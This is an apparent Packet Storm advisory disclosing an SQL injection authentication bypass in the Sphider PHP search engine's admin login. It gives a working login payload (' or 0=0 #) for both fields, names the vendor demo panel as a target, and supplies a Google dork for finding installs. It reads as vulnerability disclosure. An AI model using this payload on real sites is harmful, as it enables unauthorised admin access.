Sphider suffers from a remote SQL injection vulnerability that allows for authentication bypass.
2a3ebd5a9a3453ec0e2991992a63f25372d96b16aa18cc4a2b759fe5f04b0565Sphider SQL injection vulnerabilties
vendor: www.sphider.eu
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: epsilonlambda.co.cc
Google dork: © Ando Saabas 2005-2007
Description about the Sphider
Sphider is a lightweight web spider and search engine written in PHP, using MySQL as its back end database. It is a great tool for adding search functionality to your web site or building your custom search engine. Sphider is small, easy to set up and modify, and is used in thousands of websites across the world.
Exploits:
SQLi Vulnerability
The attackers can use the authentication bypass to get in to the admin panel in the http://www.sphider.eu/demo.php section of the site.
Exploit: Username: ' or 0=0 #
Password: ' or 0=0 #
-----------------------------------------------------------------------------------------------------------------------------
Tribite to side^effects and love to taashu.
-----------------------------------------------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed